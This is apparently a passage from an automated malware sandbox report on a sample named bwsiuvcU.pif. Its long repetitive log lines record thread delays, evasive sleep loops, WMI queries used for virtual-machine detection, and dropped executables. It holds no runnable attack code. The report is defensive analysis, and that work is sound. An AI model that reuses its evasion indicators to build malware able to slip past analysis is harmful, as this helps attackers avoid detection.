Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1194719	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1200000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199865
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199744
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199618
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199448
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199323
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199199
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199043
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198916
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198764
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198627
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198467
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198331
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1200000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199829
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199704
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199590
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199469
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199359
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199250
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199110
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198888
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198781
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198657
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198532
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198422
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198297
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198185
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198078
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197954
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197836
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197730
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197586
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197471
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197344
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197235
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197094
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196985
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196875

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3319	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2828	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5125	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4640	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4699	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5088	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Window / User API: threadDelayed 4680	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Window / User API: threadDelayed 5110	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Window / User API: threadDelayed 2876
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Window / User API: threadDelayed 3306
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Window / User API: threadDelayed 3310
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Window / User API: threadDelayed 6521

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Roaming\uc.exe

Dropped PE file which has not been started: C:\Users\Public\Libraries\easinvoker.exe

Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\Public\Libraries\Ucvuiswb.PIF

API coverage: 8.9 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1836	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3812	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7636	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852	Thread sleep count: 4699 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856	Thread sleep count: 5088 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 6480	Thread sleep count: 4680 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -99872s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 6480	Thread sleep count: 5110 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -99749s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -99640s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -99530s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -99417s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -99297s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -99181s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -99071s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -98959s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -98843s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -98734s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -98624s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -98515s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -98399s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -98296s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -98176s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -98062s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -97945s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -97825s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -97718s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -97609s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -97499s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -97390s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -97281s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -97169s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -97062s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -96953s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -96843s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -96734s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -96624s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -96515s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1200000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1199809s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1199687s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1199305s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1199172s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1197547s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1197435s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1197328s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1197219s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1197109s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1197000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1196880s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1196766s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1196652s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1196544s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1196403s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1196229s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1196124s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1196012s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1195854s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1195728s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1195608s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1195470s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1195295s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1195143s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1194979s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1194835s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1194719s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -100000s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 1928	Thread sleep count: 2876 > 30
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -99879s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 1928	Thread sleep count: 3306 > 30
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -99765s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -99655s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -99546s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -99435s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -99325s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -99209s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -99078s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -98936s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -98822s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -98718s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -98606s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -98484s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -98374s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -98264s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -98156s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -98046s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -97936s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -97797s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -97685s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -97564s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -97424s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -97292s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -97180s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -1200000s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -1199865s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -1199744s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -1199618s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -1199448s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -1199323s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -1199199s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -1199043s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -1198916s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -1198764s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -1198627s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -1198467s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -1198331s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep count: 32 > 30
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -100000s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 7992	Thread sleep count: 3310 > 30
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -99875s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 7992	Thread sleep count: 6521 > 30
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -99751s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -99609s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -99500s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -99388s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -99265s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -99146s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -99019s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -98890s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -98781s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -98672s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -98562s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -98453s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -98342s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -98218s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -98109s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -97979s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -97859s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -97750s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -97631s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -97515s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -97390s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -97278s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1200000s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1199829s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1199704s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1199590s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1199469s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1199359s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1199250s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1199110s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1199000s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1198888s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1198781s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1198657s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1198532s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1198422s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1198297s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1198185s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1198078s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1197954s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1197836s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1197730s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1197586s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1197471s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1197344s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1197235s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1197094s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1196985s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1196875s >= -30000s

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Last function: Thread delayed
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Last function: Thread delayed
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Last function: Thread delayed
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\uc.exe

Code function: 19_2_029858CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

19_2_029858CC

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99872	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99749	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99640	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99530	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99417	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99297	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99181	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99071	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98959	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98843	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98734	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98624	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98515	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98399	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98296	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98176	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98062	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97945	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97825	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97718	Jump to behavior
